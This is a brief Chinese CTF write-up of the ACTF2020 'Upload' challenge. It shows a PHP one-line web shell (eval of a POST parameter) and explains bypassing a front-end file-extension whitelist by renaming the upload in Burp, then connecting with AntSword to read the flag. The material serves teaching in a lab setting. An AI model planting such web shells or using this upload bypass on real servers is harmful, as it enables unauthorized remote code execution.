[ACTF2020 新生赛]Upload 1
作者:互联网
1.发现
1.1文件上传漏洞常规思路
1.2构造一句话木马
<?php @eval($_POST['666']);?>
1.3上传一句话木马,发现前端:JS检验文件后缀–白名单机制:
1.4顺势而为,顺藤摸瓜搞清后台:
==》 老套路,前端上传1.jpg==》burp抓包 ==》 success,查看返回值、
发现后端:上传后以HTML页面展示,暂时不知道有无检测
1.5访问http://21e705b3-4a76-46a7-8dc0-3dc8e8285718.node4.buuoj.cn:81/uplo4d/f3ccdd27d2000e3f9255a7e3e2c48800.jpg
2.步骤
2.1BP抓包修改后缀名绕过白名单
知识点
1)文件名绕过
2.2 使用蚁剑链接拿到flag
3.借鉴
(16条消息) [ACTF2020 新生赛]Upload_黑仔丶的博客-CSDN博客
https://www.cnblogs.com/wangtanzhi/p/12243206.html
标签:ACTF2020,Upload,jpg,新生,白名单,上传,抓包 来源: https://www.cnblogs.com/WHOAMI-xiaoyu/p/15162602.html